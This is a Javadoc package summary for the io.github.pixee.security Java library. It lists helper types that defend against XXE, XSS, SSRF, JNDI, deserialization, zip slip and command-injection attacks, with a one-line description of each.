Module io.github.pixee.security
Package io.github.pixee.security
The intent of these types is to offer APIs that are usable by developers for implementing common
security tasks.
-
Interface Summary Interface Description HostValidator A type that validates hosts to be connected.JNDI.LimitedContext A lookalike method forContextthat allows sandboxing resolution. -
Class Summary Class Description BoundedLineReader This type exposes helper methods to deal with protecting I/O operations.DocumentBuilderFactorySecurity This type exposes helper methods that will help defend against XXE attacks inDocumentBuilderFactory.Filenames This type offers utilities to safely deal with filenames.HtmlEncoder This type exposes helper methods that will help defend against XSS attacks with HTML encoding.JNDI Offers utilities to defend against JNDI attacks by controlling allowed resources.Newlines This type exposes helper methods that will help defend against newline-based attacks.Reflection This type exposes helper methods that will help defend against attacks involving reflection and classloading.SystemCommand This type offers utility methods to run system commands more safely.UnwantedTypes This type is only intended to hold a list of types that we don't want to deserialize because they pose a security risk.Urls This type exposes utilities to help developers protect against server-side request forgery (SSRF) and any other possible attacks based on creating unvalidated URLs.ValidatingObjectInputStreams This type exposes helper methods that will help defend against Java deserialization attacks leveragingObjectInputStreamAPIs by wrapping it in an Apache Commons IOValidatingObjectInputStreamthat is configued to reject types that are known to be leveraged in deserialization attacksXMLDecoderSecurity This type offers APIs to help secure the usage ofXMLDecoder.XMLInputFactorySecurity This type exposes helper methods that will help defend against XXE attacks inXMLInputFactory.ZipSecurity This type exposes helper methods to deal with attacks related to Zipping operations, most notably the "zip slip" attack. -
Enum Summary Enum Description ReflectionRestrictions The set of restrictions developers can use when usingReflectionAPIs.SystemCommandRestrictions The restrictions that could be applied to a command being run through this type.UrlProtocol The set of protocols that we can allow (notice "ANY") is an option inUrlsmethods.XMLRestrictions The set of restrictions that we can apply to a secured XML read.